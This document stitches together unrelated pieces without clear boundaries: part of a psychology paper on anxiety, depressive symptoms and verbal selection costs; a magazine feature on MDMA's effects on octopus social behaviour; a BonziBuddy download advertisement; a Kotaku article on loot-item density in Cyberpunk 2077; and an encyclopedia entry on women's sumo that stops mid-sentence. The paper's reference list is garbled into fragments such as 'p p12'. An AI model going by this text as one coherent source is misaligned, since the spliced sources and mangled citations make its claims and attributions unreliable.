al., 2007). Comorbid anxiety and depression often produce worse outcomes than either alone, including more severe symptoms, higher rates of recurrence, worse psychosocial function, and poorer treatment response (e.g., Moffitt et al., 2007; Rivas-Vasques et al., 2004). Some research also suggests that both anxiety and depression can contribute to cognitive deficits; for example, anxiety and depression are each associated with deficits in executive function (EF, e.g., Snyder et al., 2010; Snyder, 2013). Co-occurring anxiety and depression may have additive effects on EF deficits, as evidenced by studies that have found that individuals with comorbid depressive and anxiety disorders have worse performance on some EF tasks than individuals with either depressive or anxiety disorders alone (e.g., Basso et al., 2007). However, anxiety and depression are also associated with distinct profiles of symptoms and neurobiology: current clinical models and empirical evidence generally agree that whereas anxiety and depression are related constructs with some shared aspects, they are nonetheless distinct, with aspects that are unique to each (e.g., for review see Moffitt et al., 2007). In fact, some evidence suggests that they can have opposing effects on brain and behavior, such as the finding that anxiety symptoms were associated with a greater visual attentional bias towards the right hemisphere (left visual field), and depressive symptoms with greater bias towards the left hemisphere (Keller et al., 2000). These asymmetries only became apparent when controlling for the variance in common between anxiety and depressive symptoms (Keller et al., 2000). Similarly, anxiety and depressive symptoms were associated with opposing patterns of activity in several brain regions during an emotional Stroop task (although there were no behavioral differences; Engels et al., 2007). Finally, participants with social anxiety disorder alone generally had reduced performance on EF tasks under social stress compared to non-stress baseline, whereas those with comorbid social anxiety and depression generally improved their performance under social stress, although the performance of the comorbid group was never significantly better than that of the social anxiety only group (Graver & White, 2007). Given these distinct mechanisms and effects, it is possible that in some cases anxiety and depressive symptoms could have opposing effects. That is, the neurobiological changes associated with these symptoms could have countervailing effects on specific aspects of EF, such that one is associated with impaired performance, and the other with improved performance. To our knowledge this has never been demonstrated. We examine this issue in the context of the ability to select among competing options, an aspect of EF that is critical for language and decision-making. We assess selection across three different tasks to generate a robust composite measure. Composite scores that aggregate results across multiple tasks provide a more accurate and reliable measure of the intended EF than single tasks, because the non-executive task requirements specific to each task (e.g., visual processing of pictures in blocked cyclic naming vs. sentence reading in the sentence completion task) have less influence (e.g., Miyake et al., 2000). The current study aims to (a) extend the previous finding that anxiety symptoms are associated with impaired selection (Snyder et al., 2010) to this more reliable composite measure and to individuals with clinically relevant levels of anxiety, and (b) test the specificity of selection deficits to anxiety, namely, the possibility that anxiety and depressive symptoms may have opposing effects. Method Participants Participants were 162 native English-speaking young adult undergraduate students from the University of Colorado Boulder (71% female). We used an extreme group design, which allowed us not only to evaluate the association between impaired selection and clinically significant levels of anxiety, but given the expected linear effect of anxiety (Snyder et al., 2010) also provides a more optimized or powerful test of the association between selection and anxiety (McClelland, 1997). Participants were selected based on Penn State Worry Questionnaire scores (PSWQ, Meyer, Miller, Metzger, & Borkovec, 1990), a 16-item scale evaluating symptoms of anxious apprehension. Participants scoring in the top (>48, n = 116) and bottom (<34, n = 46) quartiles (Gillis, Haaga, & Ford, 1995) were included in the current study. The distribution of PSWQ scores for the students completing the pre-screening process closely matched previously published norms (e.g., Gillis et al., 1995). The top quartile score we used for classifying participants into the high anxiety subsample is slightly higher than the cut score recommended for screening for generalized anxiety disorder (Behar, Alcaine, Zuellig & Borkovec, 2003). Depressive symptoms were assessed with the Beck Depression Inventory – Second Edition (BDI-II, Beck, Steer, & Brown, 1996), a 21-item scale evaluating current symptoms of depression. Participants gave informed consent, were treated in accordance with procedures approved by the University of Colorado Boulder Institutional Review Board, and were compensated with course credit or $15. Materials and Procedure Trained research assistants tested participants individually in a quite room in a one-hour session. Participants completed three tasks that assessed verbal selection abilities to yield a composite score: verb generation (e.g., Snyder et al., 2010), blocked cyclic naming (e.g., Schnur, Schwartz, Brecher, & Hodgson, 2006) and sentence completion (e.g., Snyder & Munakata, 2008). In each, reaction times (RT) were recorded using a voice-activated microphone. Responses were also audio-recorded and transcribed to remove error trials. In addition, participants completed measures that allowed us to statistically control for psychomotor speed and IQ. Verb generation Verb generation was administered as in Snyder et al. (2010). Stimuli were 25 nouns in two conditions: high competition with many possible verb responses (e.g., cat, associated with purr, lick, meow, etc.) and low competition with few possible verb responses (e.g., scissors, associated with cut). Participants saw nouns one at a time and stated the first verb that came to mind (something the noun does or something that could be done with the noun). Data were excluded for 10 participants due to failure to follow task directions (>25% errors, leaving too few valid trials for accurate RT analysis), and data were missing from one participant due to equipment failure. Blocked cyclic naming Participants repeatedly named 16 pictures as quickly as possible in two conditions: homogenous blocks of pictures from the same category (e.g., bed, table, bench, crib), and mixed blocks with each picture from a different category (e.g., lion, pajamas, bench, car). The homogenous condition creates high competition among responses due to spreading semantic activation, whereas the mixed condition has low competition (e.g., Schnur et al., 2006). Participants completed eight blocks, each with four pictures repeated six times in different orders. The same pictures appeared in both conditions. Data were missing for one participant due to equipment failure. Sentence completion Sentence completion was administered as in Snyder and Munakata (2008). Stimuli were sentences with the final word omitted, with 50 sentences each in two conditions: high competition with many possible endings (e.g., There is something grand about the _____.), and low competition with few possible endings (e.g., He mailed the letter without a______.). Participants read sentences silently as they appeared in segments of 1–2 words (to control reading speed) then said a word aloud to complete the sentence. The final segment always contained one word and the blank. Data were missing for one participant due to equipment failure. North American Adult Reading Test (NAART) The NAART is a well-established IQ estimate (Uttl, 2002). Participants read 60 irregular words aloud, which increased in difficulty (e.g., debt to synecdoche). Estimated full scale IQ was calculated from the number of incorrect pronunciations (Uttl, 2002). One participant did not complete the NAART due to experimenter error. Choice RT Participants pressed buttons with their left and right hands as fast as possible when presented with left or right pointing triangles. Data were missing for three participants due to equipment failure, and one participant did not complete Choice RT due to experimenter error. Data Analysis Data were transformed and dependent variables calculated as in previous research (e.g., Snyder et al., 2010). Incorrect responses (e.g., non-verbs in verb generation) and microphone errors (e.g., failing to trigger) were excluded. Trials with RTs <200 ms, >10,000 ms, or greater than three standard deviations above the participant’s mean RT, were trimmed (excluded from analysis). RTs were log transformed to remove skew and z-transformed within subjects to remove baseline differences in RT. For the verb generation, blocked cyclic naming, and sentence completion tasks, selection cost was calculated as the z RT difference between the high competition and low competition conditions. Selection costs for each task were z-transformed across subjects (to put them on the same scale and thus give them equal weight in the composite score) and averaged into the primary measure of interest, the selection composite score. To provide a full picture of the effects of anxiety and depressive symptoms separately as well as effects of those aspects of anxiety and depression that are unique to each (controlling for the other variable), data were analyzed with regression analyses testing the effects on selection composite scores (and on selection cost for each task) of (1) PSWQ scores, (2) BDI-II scores, (3) PSWQ and BDI-II scores simultaneously, and (4) PSWQ and BDI-II scores controlling for NAART and choice RT. Outliers were excluded using the standard cut-off of standardized DfBeta > 2/√n. Results Participant Characteristics Overall, the average PSWQ score was 52.15, SD = 17.61, range 16–80, and the average BDI-II score was 11.44, SD = 9.93, range 0–46. PSWQ and BDI-II scores were correlated, r = .56, p < .001, n = 162, consistent with previous studies (e.g., Stöber & Joormann, 2001), and below commonly accepted cut-offs above which collinearity is considered a potential concern in multiple regression (e.g., O’Brien, 2007). The mean PSWQ score for the high anxiety subsample was 62.21, SD = 8.15, range 49–80, above the 90th percentile (Gillis et al., 1995) and similar to levels reported for participants with anxiety disorders (e.g., Behar et al., 2003). The mean BDI-II score for the high anxiety subsample was 14.34, SD = 10.21, range 0–46, with 47% in the dysphoric to dysphoric/depressed range using the criteria of Dozois, Dobson, and Ahnberg (1998). Thus, although the high anxiety subsample was not clinically diagnosed, their average self-reported levels of anxiety and depressive symptoms are likely of clinical significance. Moreover, there was a wide range of depressive symptoms. Thus, restriction of range was not a concern in analyzing the effects of depressive symptoms in the high anxiety subsample. IQ estimates on the NAART were in the average range, mean = 107.12, SD = 6.10, range 92–122, and the high anxiety subsample had nearly identical IQ scores, mean = 107.28, SD = 6.06, range 94–121. All participants had IQs in the normal range or above (>90) Selection Regression analyses are reported in . Models 1 and 2 respectively tested the separate effects of anxiety and depressive symptoms. For the primary measure of interest, selection composite scores, there was a significant effect of anxiety, such that as anxiety symptoms (PSWQ) increased, so did selection costs (i.e., performance decreased), β = 0.28, p = .001, but there is no significant effect of depressive symptoms (BDI-II), β = −0.02, p = .83. 1 The key model of interest, Model 3, included both anxiety and depressive symptoms, and thus tested the effects of anxiety controlling for depression and depression controlling for anxiety. For the primary measure of interest, selection composite scores, there were significant effects of both anxiety and depressive symptoms. Controlling for level of depressive symptoms (BDI-II), as anxiety symptoms (PSWQ) increased, so did selection costs (i.e., performance decreased), β = 0.43, p < .001 (). However, after removing the variance associated with anxiety, the effects of depression were in the opposite direction: controlling for anxiety symptoms, as depressive symptoms increased, selection costs decreased (i.e., performance increased), β = −0.28, p = .007 (). 2 This suggests that it is the variance in depressive symptoms that is not shared in common with anxiety symptoms that predicts improved selection. Importantly, these effects remained significant in the high anxiety subsample. That is, among participants with clinically significant levels of anxiety, those with more severe depressive symptoms had smaller selection costs, β = −0.29, p = .012. Moreover, even within the restricted range of anxiety levels in the high anxiety subsample, higher levels of anxiety symptoms still predicted increased selection costs when controlling for depressive symptoms, β = 0.25, p = .026. Open in a separate window Open in a separate window Table 1 Dependent Variable Model Independent Variable Beta t p Model R2 Model p Selection Composite a 1 PSWQ 0.282* 3.44 .001 .080 .001 2 BDI-II −0.018 −0.22 .829 .000 .829 3 PSWQ 0.431* 4.25 <.001 .122 <.001 BDI-II −0.280* −2.76 .007 4 PSWQ 0.439* 4.26 <.001 .124 .002 BDI-II −0.283* −2.77 .006 IQ 0.025 0.30 .765 Choice RT −0.035 −0.41 .682 Selection Composite High Anxiety Subsample b 1 PSWQ 0.119 1.16 .248 .014 .248 2 BDI-II −0.167 −1.66 .101 .028 .101 3 PSWQ 0.254* 2.26 .026 .078 .022 BDI-II −0.287* −2.56 .012 4 PSWQ 0.277* 2.36 .021 .084 .087 BDI-II −0.298* −2.61 .010 IQ 0.700 0.66 .508 Choice RT −0.023 −0.23 .819 Sentence Completion c 1 PSWQ 0.169* 2.02 .045 .029 .045 2 BDI-II −0.022 −0.27 .792 .001 .792 3 PSWQ 0.260* 2.48 .014 .052 .026 BDI-II −0.186# −1.74 .085 4 PSWQ 0.276* 2.64 .009 .067 .057 BDI-II −0.186# −1.75 .082 IQ 0.083 0.95 .345 Choice RT −0.108 −1.23 .222 Verb Generation d 1 PSWQ 0.150# 1.72 .087 .022 .087 2 BDI-II 0.009 0.10 .918 .000 .918 3 PSWQ 0.229* 2.05 .043 .033 .126 BDI-II −0.128 −1.14 .255 4 PSWQ 0.233* 2.05 .042 .035 .4 BDI-II −0.131 −1.16 .248 IQ 0.460 0.49 .624 Choice RT 0.022 0.24 .814 Blocked Cyclic Naming e 1 PSWQ 0.259* 3.09 .002 .067 .002 2 BDI-II 0.002 0.02 .981 .000 .981 3 PSWQ 0.341* 3.25 .001 .079 .004 BDI-II −0.137 −1.31 .194 4 PSWQ 0.303* 2.89 .004 .117 .003 BDI-II −0.122 −1.18 .242 IQ −0.023 −0.28 .784 Choice RT 0.191* 2.22 .028 Open in a separate window Controlling for choice RT and IQ in the regression analyses did not alter any of the results, and choice RT and IQ did not significantly correlate with PWSQ or BDI-II scores (Model 4, ps > .15). Finally, we also ran regression analyses testing for an interaction between anxiety and depressive symptoms; however, the interaction was not significant for the composite measure (p = .83) or any individual task (ps > .23), so we report only main effect analyses. Discussion The current study demonstrates that anxiety is associated with impaired selection, supporting our earlier finding in a non-selected sample (Snyder et al., 2010), and extending it to people with more highly elevated anxiety symptoms and to additional tasks measuring verbal selection. Furthermore, the use of an extreme group design in the current study provided a more efficient and statistically powerful test of the association between verbal selection and anxiety relative to the use of an unselected, random sample (McClelland, 1997). Because the current study used selected high and low anxiety groups, conclusions about the linearity of this effect across the middle range of anxiety symptom levels cannot be drawn; however, taken together with the earlier study, these results suggest that verbal selection deficits are significantly and positively associated with anxiety, including clinically significant levels of anxiety symptoms. These findings are consistent with our model, which posits that reduced neural inhibition associated with anxiety leads to an impaired ability to resolve competition among response options (Snyder et al., 2010). Although the current results demonstrate selection impairments in language production tasks, it is possible that difficulty selecting among competing representations could also play a role in indecisiveness, procrastination, and intolerance of uncertainly associated with anxiety, due to the difficulty of selecting appropriate courses of action and outcome representations. Understanding the core EF deficits involved in these phenomena is important because problems making decisions can interfere with the ability to achieve major life goals, whereas intolerance of uncertainty leads to avoiding many potentially positive experiences, and may promote the maintenance or increase of anxiety (e.g., Chen & Hong, 2010). Future research is needed to determine whether impaired selection on simple non-affective tasks, such as language production tasks, predicts indecisiveness, procrastination, and intolerance of uncertainty, beyond what is predicted by anxiety alone, and what causal role this may play in the development or maintenance of anxiety. Counterintuitively, the current study found that the unique aspect of depressive symptoms that is not shared with anxiety (i.e., controlling for anxiety) is associated with better selection, as indexed by a composite measure of three verbal selection tasks. This finding is in contrast to theories suggesting that anxiety and depression additively contribute to EF deficits (e.g., Basso et al., 2007), but is in accord with previous evidence for opposite changes in brain and behavior associated with anxiety and depressive symptoms in other domains (e.g., Keller et al., 2000). The current study shows for the first time that anxiety and depressive symptoms have opposite effects on one aspect of EF: verbal selection among competing options. Importantly, these effects also held true for the subsample of participants with clinically significant levels of anxiety, suggesting that the results may generalize to individuals with clinically elevated levels of anxiety with and without co-occurring depression. Although the current study cannot directly address the reasons for this effect, one intriguing possibility is that anxiety and depression may be related to opposing changes in neural activity in prefrontal areas critical for EF. Specifically, whereas anxiety is associated with reduced function of the major inhibitory neurotransmitter GABA (e.g., for review see Kalueff & Nutt, 2007), depression is associated with reduced function of the major excitatory neurotransmitter glutamate (e.g., for review, see Yüksel & Ongur, 2010). 3 Neural network simulations and our previous empirical research have demonstrated how GABAergic interneurons in prefrontal circuits can play a key role in selection, by allowing one representation to more quickly win out over competing options (Snyder et al., 2010). Our preliminary extensions to these neural network simulations suggest that reduced glutamatergic function can improve selection by reducing activation of competing responses. Thus, reduced glutamate associated with increasing depressive symptoms could counteract the effects of reduced GABA associated with increasing anxiety symptoms, leading to improvements in selection. This theory makes testable predictions: for example, depressive symptoms should improve performance only on tasks requiring competitive inhibition, such as selection, and should harm performance on tasks requiring neural excitation, such as working memory maintenance. This prediction is consistent with findings that working memory and active maintenance of task goals are impaired in individuals with depressive disorders (e.g., Snyder, 2013). Future research is needed further test this prediction by carefully differentiate the effects of anxiety and depressive symptoms on different aspects of EF. One alternative possibility is that individuals with elevated depressive symptoms who are able to cope with their depression effectively enough to attend college might have better pre-existing cognitive function, which both allows them to attend college despite their depression and to do well on selection tasks. However, depressive symptoms did not predict performance on IQ or psychomotor speed tasks, suggesting the groups did not differ in general intellectual function or motivation. Nonetheless, the possibility cannot be ruled out that college students with elevated depressive symptoms are self-selected for high EF in particular. Future research with community samples can address this question. In sum, we confirm that anxiety is associated with a robust and specific impairment in verbal selection among competing options, while adding the novel finding that depressive symptoms may have opposite effects. This counterintuitive effect could potentially explain mixed evidence for EF deficits associated with anxiety (Castaneda et al., 2008), because previous studies may have varied in the levels of co-occurring depressive symptoms, as well as the sensitivity of their tasks to the effects of depression. Our results emphasize the need to control for co-occurrence and consider the ways that anxiety and depression may differentially affect EF. Further, our results suggest that specific neural mechanisms associated with individual EF processes may be affected differently by anxiety and depression. Future research is needed to investigate these mechanisms and explore the implications for understanding and ameliorating impairments in daily functioning associated with these common mental health problems. Acknowledgments This research was supported by grants from the National Institutes of Health (P50-MH079485, F31-MH087073). We thank Bidita Dutta and David Story for assistance with data collection and members of the P50 center on Executive Function and Dysfunction for valuable discussions. Footnotes 1The same pattern holds for all individual tasks: The effect of anxiety alone is significant or marginal for all tasks, whereas the effect of depressive symptoms alone is non-significant and near zero (see ). 2For the individual tasks, anxiety symptoms significantly predicted increased selection costs for all tasks, whereas the effects of depressive symptoms were in the same direction as the composite measure, but did not reach significance (see ). 3Reduced GABA is also found in depressed patients, who nearly always also have high anxiety (e.g., Kalueff & Nutt, 2007), but reduced glutamate is not associated with anxiety (Phan et al., 2005). References Basso MR, Lowery N, Ghormley C, Combs D, Purdie R, Bornstein R. Comorbid anxiety corresponds with neuropsychological dysfunction in unipolar depression. p p12 [PubMed] [CrossRef] [Google Scholar] Beck AT, Steer RA, Brown GK. Manual for the Beck Depression Inventory. 2. San Antonio, TX: The Psychological Corporation; 1996. [Google Scholar] Behar E, Alcaine O, Zuellig AR, Borkovec TD. Screening for generalized anxiety disorder using the Penn State Worry Questionnaire: A receiver operating characteristic analysis. p p34 [PubMed] [CrossRef] [Google Scholar] Chen CY, Hong RY. Intolerance of uncertainty moderates the relation between negative life events and anxiety. p p49 [CrossRef] [Google Scholar] Dozois DJA, Dobson KS, Ahnberg JL. A psychometric evaluation of the Beck Depression Inventory–II. p p10 [CrossRef] [Google Scholar] Engels AS, Heller W, Mohanty A, Herrington J, Banich MT, Webb A, Miller GA. Specificity of regional brain activity in anxiety types during emotion processing. p p44 [PubMed] [CrossRef] [Google Scholar] Gillis MM, Haaga DAF, Ford GT. Normative values of the Beck Anxiety Inventory, Fear Questionnaire, Penn State Worry Questionnaire, and Social Phobia and Anxiety Inventory. p p7 [CrossRef] [Google Scholar] Graver CJ, White PM. Neuropsychological effects of stress on social phobia with and without comorbid depression. p p45 [PubMed] [CrossRef] [Google Scholar] Kalueff AV, Nutt DJ. Role of GABA in anxiety and depression. p p24 [PubMed] [CrossRef] [Google Scholar] Keller J, Nitschke J, Bhargava T, Deldin PJ, Gergen J, Miller GA, Heller W. Neuropsychological differentiation of depression and anxiety. p p109 [PubMed] [CrossRef] [Google Scholar] McClelland GH. Optimal design in psychological research. p p2 [CrossRef] [Google Scholar] Meyer TJ, Miller ML, Metzger RL, Borkovec TD. Development and validation of the Penn State Worry Questionnaire. p p28 [PubMed] [CrossRef] [Google Scholar] Miyake A, Friedman NP, Emerson MJ, Witzki AH, Howerter A, Wager TD. The unity and diversity of executive functions and their contributions to complex “frontal lobe” tasks: A latent variable analysis. p p41 [PubMed] [CrossRef] [Google Scholar] Moffitt TE, Harrington H, Caspi A, Kim-Cohen J, Goldberg D, Gregory AM, Poulton R. Depression and generalized anxiety disorder: Cumulative and sequential comorbidity in a birth cohort followed prospectively to age 32 years. p p64 [PubMed] [CrossRef] [Google Scholar] O’Brien RM. A caution regarding rules of thumb for variance inflation factors. p p41 [CrossRef] [Google Scholar] Phan KL, Fitzgerald DA, Cortese BM, Seraji-Bozorgzad N, Tancer ME, Moore GJ. Anterior cingulate neurochemistry in social anxiety disorder: 1H-MRS at 4 Tesla. p p16 [PubMed] [CrossRef] [Google Scholar] Rassin E, Muris P, Franken I, Smit M, Wong M. Measuring general indecisiveness. p p29 [CrossRef] [Google Scholar] Rivas-Vazquez RA, Saffa-Biller D, Ruiz I, Blais MA, Rivas-Vazquez A. Current issues in anxiety and depression: Comorbid, mixed, and subthreshold disorders. p p35 [CrossRef] [Google Scholar] Schnur TT, Schwartz MF, Brecher A, Hodgson C. Semantic interference during blocked-cyclic naming: Evidence from aphasia. p p54 [CrossRef] [Google Scholar] Snyder HR. Major depressive disorder is associated with broad impairments on neuropsychological measures of executive function: A meta-analysis and review. p p139 [PMC free article] [PubMed] [CrossRef] [Google Scholar] Snyder HR, Hutchison N, Nyhus E, Curran T, Banich MT, O’Reilly RC, Munakata Y. Neural inhibition enables selection during language processing. p p107 [PMC free article] [PubMed] [CrossRef] [Google Scholar] Snyder HR, Munakata Y. So many options, so little time: The roles of association and competition in underdetermined responding. p p15 [PMC free article] [PubMed] [CrossRef] [Google Scholar] Stöber J, Joormann J. Worry, procrastination, and perfectionism: Differentiating amount of worry, pathological worry, anxiety, and depression. 2001;:49–60. p25 [Google Scholar] Uttl B. North American Adult Reading Test: Age norms, reliability, and validity. p p24 [PubMed] [CrossRef] [Google Scholar] Yüksel C, Ongur D. Magnetic resonance spectroscopy studies of glutamate-related abnormalities in mood disorders. p p68 [PMC free article] [PubMed] [CrossRef] [Google Scholar]
1
What Ecstasy Does to Octopuses(2018)
When Gül Dölen first gave ecstasy to octopuses, she didn’t know what to expect. Dölen is a neuroscientist at the Johns Hopkins School of Medicine who studies how the cells and chemicals in animal brains influence animals’ social lives. Ecstasy, also known as MDMA, interests her because it’s known to make people feel more sociable, more interested in others, and less defensive. The same effects also occur in rats and mice—the animals that Dölen usually studies. But octopuses are very different creatures. They’re clearly intelligent and their behavior is undoubtedly sophisticated, but their brains have a completely different architecture than those of mammals—for one thing, they’re shaped like donuts. “It’s organized much more like a snail’s brain than ours,” Dölen says. With such a dissimilar anatomy, she wondered whether these animals would respond to drugs in unpredictable ways. And to find out, she needed a way of assessing how sociable an octopus is. She and her colleague Eric Edsinger put five Californian two-spot octopuses individually into the middle of three connected chambers and gave them free rein to explore. One of the adjacent chambers housed a second octopus, confined inside an overturned plastic basket. The other contained an unfamiliar object, such as a plastic flower or a Chewbacca figurine. Dölen and Edsinger measured how long the main animal spent in the company of its peer, and how long with the random toy. This is exactly the kind of setup that neuroscientists use to test social behavior in mice, but Dölen had no idea whether it would work with octopuses. “It might be that they are so smart that the kind of task we’d use for a mouse would be boring to them,” she says. “Maybe they’d take one lap around the chambers and stop.” Fortunately, that wasn’t the case. The free-moving individuals thoroughly explored the chambers, and from their movements, Dölen realized that individuals of any sex gravitate toward females, but avoid males. Next, she dosed the animals with ecstasy. Again, there’s no precedent for this, but researchers often anesthetize octopuses by dunking them in ethanol—a humane procedure with no lasting side effects. So Dölen and Edsinger submerged their octopuses in an MDMA solution, allowing them to absorb the drug through their gills. At first they used too high a dose, and the animals “freaked out and did all these color changes,” Dölen says. But once the team found a more suitable dose, the animals behaved more calmly—and more sociably. With ecstasy in their system, the five octopuses spent far more time in the company of the same trapped male they once shunned. Even without a stopwatch, the change was obvious. Before the drug, they explored the chamber with the other octopus very tentatively. “They mashed themselves against one wall, very slowly extended one arm, touched the [other animal], and went back to the other side,” Dölen says. “But when they had MDMA, they had this very relaxed posture. They floated around, they wrapped their arms around the chamber, and they interacted with the other octopus in a much more fluid and generous way. They even exposed their [underside], where their mouth is, which is not something octopuses usually do.” But most octopuses, with some exceptions, are solitary hermits, and Jennifer Mather from the University of Lethbridge isn’t convinced that ecstasy is making them sociable. Instead, the drug might just mess with their ability to detect the chemical cues of potential mates. “There’s no proof that it is anything more than attraction,” she says. Harriet de Wit from the University of Chicago, who has studied ecstasy’s effects on animals, has other concerns. “It’s an innovative and exciting study,” she says, but it’s unfortunate that the duo always tested the octopuses first after a dunk in normal salt water and then after an ecstasy bath. In pharmacology studies, scientists normally mix up the order in which animals receive the drug and the saline control. Without that counterbalancing, it’s hard to say why the octopuses were behaving differently the second time around: Was it because of the ecstasy, or simply because they had become familiar with the arena, the plastic toy, or the other octopus? Dölen admits that the study is just a pilot, and one with a very small sample size. “We would obviously want other people to try and repeat it in a much larger group of animals,” she says. “But we wanted to publish it, because there really aren’t established protocols for delivering drugs to octopuses or doing social tests with them.” She hopes that her findings will encourage more neuroscientists to study these beguiling animals. She’s not the first to make such a call, either. In 1964, the English zoologist J. Z. Young wrote a book called A Model of the Brain, in which he encouraged scientists to study the brains of a wide variety of species, octopuses included. “We could say the octopus brain is totally different to a human one, but we need this synapse or this neurotransmitter,” Dölen says. “We could write down a list of these minimal building blocks of complex behavior.” And that’s what she and Edsinger have started doing. They knew that ecstasy works by causing neurons to release serotonin, a signaling chemical that affects our mood. The drug does that by sticking to a protein called the serotonin transporter, or SERT, which neurons normally use to suck up the chemical. Ecstasy’s presence reverses that flow, creating a massive, mood-altering dump of serotonin. Octopuses have their own version of SERT, and Dölen and Edsinger showed that it’s just a 50 percent match to ours. Despite these differences, the specific bit of the protein that sticks to ecstasy is almost identical in both species, which is why the drug affects both. “We weren’t expecting it to have quite so much overlap,” Dölen says. “Octopuses really are the best example we have on Earth of a second intelligence,” says Robyn Crook, a neuroscientist from San Francisco State University. We last shared a common ancestor with them around 800 million years ago, and their brains have evolved independently from ours. And yet Dölen’s study showed that our brains have a few extreme similarities, from the molecular level to the behavioral one. It strengthens the idea, Crook says, that “there are only so many ways to make an intelligent brain.”
13
BonziBuddy
p Take a minute... and make a friend for life! Download BonziBUDDY Now - FREE! (NOTE: This is computer software! He actually learns from you!) Welcome to the world of Bonzi BUDDY! He will explore the Internet with you as your very own friend and sidekick!  He can talk, walk, joke, browse, search, e-mail, and download like no other friend you've ever had!  He even has the ability to compare prices on the products you love and help you save money! Best of all, he's FREE! He will learn from you! Once he knows your likes and interest he will search the world and find you new sites you have not yet discovered or traveled to! He can kiss and hug friends and loved ones all over the world on your behalf! He will deliver the message himself and even talk and express emotions for you! He will handle all of your Internet file downloads for you! He will even allow you to continue browsing the Internet while he takes care of your download! He will notify you when he is done! He can keep you on schedule. He will track your appointments and tasks with his built-in calendar! He is never late for an appointment! Keeps you informed of late breaking news! He organizes the Internet the way you want it! He will make you smile throughout your day with his little gorilla personality! He can educate people of all ages with his wealth of knowledge and trivia! He makes your computer and the Internet easier, safer, and definitely more fun! He has the ability to save you money! He will search the Internet for the best price on the products you love! Download a 'Best Friend' Now -- FREE! For a limited time, you may download your own BonziBUDDY -- FREE! BonziBUDDY normally retails for $40.00, but for a limited time, we'd like to say "Thanks!" just for visiting BONZI.COM! Download BonziBUDDY Now - FREE! System Requirements: 16MB of RAM, 11MB of Free Disk Space. Windows 9x, NT 4, ME, Win2000 Sound Card. Microsoft IE (Internet Explorer) 5.0 or above. Copyright © 1995 - 2000 BONZI.COM Software Windows, Microsoft Internet Explorer, and Microsoft are registered trademarks of Microsoft Corporation.   BonziBUDDY and BONZI are trademarks of BONZI.COM Software. All rights and liabilities with respect to BonziBUDDY  belong solely to BONZI.COM Software. BonziBUDDY uses Microsoft Agent Technology.  Copyright © 1995 - 2000 - All Rights Reserved.
21
CD Projekt Is Adjusting Cyberpunk 2077's 'Distracting' Amount of Dildos
By Nathan Grayson PublishedDecember 15, 2020 Comments (194) We may earn a commission from links on this page. The first time I stepped out of my character’s apartment in Cyberpunk 2077, I expected to be greeted by a vast world of machine-powered possibility. Instead, I found a dildo. It was sitting next to a random NPC’s foot in my apartment building, near a discarded magazine and some other trash. “That’s weird,” I thought. Then I looked up and saw two additional dildos perched on a nearby bannister, positioned between two conversing NPCs who did not seem to be aware of their presence. “That, too, is weird,” I thought. view video The Week In Games: , , And MoreSystem ShockStreet Fighter 6 pNBA Jam May 23, 2023 p May 22, 2023 (Warning: This post contains imagery that might be considered NSFW, but with many of us working from home during the pandemic, what does NSFW even mean anymore, really?) In my time with Cyberpunk since, I have stumbled across many, many, many more dildos. I’ve taken to documenting every single one I come across. I have screenshotted 29 dildos. They come in two main varieties: the common “studded dildo,” the lowly street pigeon of Cyberpunk 2077's vast dildo underground, and the rarer “Pilomancer 3000,” a utensil of truly formidable size and girth. You can pick them up and either turn them into crafting parts or sell them for a few bucks. They have no use beyond this. Some have been in sex shops and clubs—places where dildos don’t seem so out of place. Others have been on street corners, in restaurants, in chop shops where human beings get disassembled for parts, and of course, scattered amongst garbage, which is pretty much everywhere. This is distracting! First off, if you create a world that in many ways resembles our own but with significantly greater dildo density, people are going to have questions. But also, I have yet to witness anybody in Cyberpunk actually use a dildo, even in a sex scene between two women. There is an unlockable dildo weapon , but it’s disconnected from the wider plethora of dildos in the game. And while something like that might fit in, say, a Saints Row game, Cyberpunk’s overall tone is much darker, even if some side-quests are humorous and over the top. So I had to know: Why all the dildos, CD Projekt Red? Why? “We wanted Night City to be pretty open sexually,” said senior quest designer Philipp Weber in an email to Kotaku, “where something by today’s standards might be taboo or kinky is very normal and commonplace by 2077 standards.” Advertisement But just scattering dildos everywhere is an odd way to convey that, especially without much else to directly communicate this larger cultural shift or tie it back to the conspicuous presence of ding dang dildos all over the ding dang place. Yes, sex workers play a large role in Cyberpunk’s story, and it’s not difficult to find them in various portions of Night City, but the game hiccups when it comes to linking this to believable human behavior. There is no reason to believe that sexual liberation would naturally result in people leaving dildos everywhere, especially in light of sanitary concerns and other practical matters. Are these disposable dildos? If not, who in this demonstrably impoverished world can afford to spend so much money on dildos that they ultimately just drop on the ground? It feels, as with many other elements of Cyberpunk 2077's worldbuilding, like a half-finished thought—an idea that must be explained, rather than one that explains itself. Meanwhile, the game does little to unravel more fundamental questions about its relationship to sex, like the fact that sex work is generally much more accepted and seemingly legal in Night City than it is in our world, yet it is for some reason still intrinsically linked to crime . Going forward, CD Projekt will not be removing Night City’s preponderance of discarded dildos. Instead, the developer will fine-tune its flock of wayward phalli. “The second reason for the high amount of dildos in the world is because they can spawn as random loot, and we were still tweaking those settings, so especially during the early reviews, the amount of dildos in the game world was pretty high. We’re going to adjust them so that the dildos don’t appear too out of place/context and distracting and more where they should be by design,” Weber said, also noting that a recent hotfix “may” have already adjusted dildo density to an extent. So, at the very least, the dildos probably won’t stand out quite so much anymore. They’ll still be present, though, as will the dildo melee weapon, and of course, we’ll always have our memories of the halcyon days of Cyberpunk’s dildo dystopia. Recommended Stories
1
Women's Sumo
Women sumo wrestling b (Japanese: p, Hepburn: onna-zumō ) is a form of sumo played by women. Professional sumo traditionally forbids women from competition and ceremonies. Women are not allowed to enter or touch the sumo wrestling ring ( dohyō ). [1] Despite this, women sumo wrestlers have existed through history and exist in the present day on an amateur level. The first recorded instance of women performing sumo, according to the Nihon Shoki , is when Emperor Yuryaku (418–479) summoned two courtesans and ordered them to wear loincloths and to sumo wrestle. Women's sumo would not become common until the 18th century in the middle of Edo (1603–1868), when a form of i was performed in some areas of Japan. Various types of women's sumo existed, including touring professionals. These continued to exist after the Meiji Restoration, [2] until women's sumo was cracked down upon by the Tokugawa shogunate and Meiji government, as they deemed the organizers of it to be corrupting public morals with these spectacles. [3] Women's sumo continued to exist despite a government ban in 1926. [2] The practice would only die after the end of World War II, with the last group dissolving in 1963. [4] Contemporary Women's Sumo Wrestling match Female sumo is not considered to be authentic by most Japanese and is now prohibited from taking place in professional settings, but exists on an amateur level. [5] [6] [7] The International Sumo Federation and its events (such as the Sumo World Championships and European Sumo Championships) allow female competitors. Women's Sumo is an event at the World Games and was also featured at the 2013 World Combat Games. [8] The first national championship for amateur women's sumo was held in 1997. The rules are identical to professional 